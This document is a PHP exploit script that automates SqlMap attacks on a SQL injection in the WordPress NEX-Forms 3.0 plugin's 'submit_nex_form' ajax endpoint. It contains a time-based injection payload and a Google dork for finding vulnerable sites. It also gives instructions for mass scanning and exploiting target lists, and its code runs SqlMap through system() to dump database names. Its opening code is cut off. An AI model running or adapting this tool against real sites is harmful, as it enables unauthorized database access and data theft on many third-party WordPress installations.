# AUTOR SCRIPT: Cleiton Pinheiro / Nick: googleINURL # Exploit name: MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL Injection Vulnerability # Type: SQL Injection # Email: inurlbr@gmail.com # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # Pastebin http://pastebin.com/u/Googleinurl # GIT: https://github.com/googleinurl # PSS: http://packetstormsecurity.com/user/googleinurl # YOUTUBE: http://youtube.com/c/INURLBrasil # PLUS: http://google.com/+INURLBrasil # Who Discovered http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli # Vulnerability discovered by: Claudio Viviani # VENTOR https://wordpress.org/plugins/nex-forms-express-wp-form-builder/ # Vulnerability Description The "submit_nex_form" ajax function is affected from SQL Injection vulnerability # Tool Description Automation script explores targets with the help of SqlMap tool Execute command SqlMap {$params['folder']} -u '{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1' --technique=B -p nex_forms_Id --dbms mysql {$params['proxy']} --random-agent --answers='follow=N' --dbs --batch --time-sec 10 --level 2 --risk 1 # GET VULN SQL can be injected in the following GET GET VULN: nex_forms_Id=(id) $nex_forms_Id=intval($_REQUEST['nex_forms_Id']) Ex: http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1 # XPL inject DBMS: 'MySQL' Exploit: AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE) - GOOGLE DORK inurl:nex-forms-express-wp-form-builder index of nex-forms-express-wp-form-builde # COMMAND --help: -t : SET TARGET. -f : SET FILE TARGETS. -p : SET PROXY Execute: php wp3xplo1t.php -t target php wp3xplo1t.php -f targets.txt php wp3xplo1t.php -t target -p 'http://localhost:9090' # EXPLOIT MASS USE SCANNER INURLBR ./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'" # DOWNLOAD INURLBR https://github.com/googleinurl/SCANNER-INURLBR # REFERENCE [1] http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli EXPLOIT CODE: not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : NULL, 'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ? $op_['f'] : NULL, 'proxy' => not_isnull_empty($op_['p']) ? "--proxy '{$op_['p']}'" : NULL, 'folder' => $folder_SqlMap, 'line' => "\t\t\t\t--------------------------------------------------------------------------------------------------------" ); not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ? exit("\t\t\t\t[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL; not_isnull_empty($params['target']) ? __exec($params) . exit() : NULL; not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL; function not_isnull_empty($valor = NULL) { RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE; } function __plus() { ob_flush(); flush(); } function __listTarget($file) { $tgt_ = array_unique(array_filter(explode("\n", file_get_contents($file['file'])))); echo "\n\033[1;37m[!] [" . date("H:i:s") . "] [INFO] TOTAL TARGETS LOADED : " . count($tgt_) . "\033[0m\n"; foreach ($tgt_ as $url) { echo "\033[1;37m[+] [" . date("H:i:s") . "] [INFO] SCANNING : {$url} \033[0m\n"; __plus(); $file['target'] = $url; __exec($file) . __plus(); } } function __exec($params) { __plus(); echo "\033[1;37m{$params['line']}\n[!] [" . date("H:i:s") . "] [INFO] starting SqlMap...\n"; echo "[+] [" . date("H:i:s") . "] [INFO] TARGET: {$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id={SQL-INJECTION}\033[0m\n"; $command = "{$params['folder']} -u '{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1' " . " -p nex_forms_Id --dbms mysql {$params['proxy']} --random-agent " . " --answers='follow=N' --dbs --batch --time-sec 10 --level 2 --risk 1"; system($command, $dados); __plus(); exit(0); }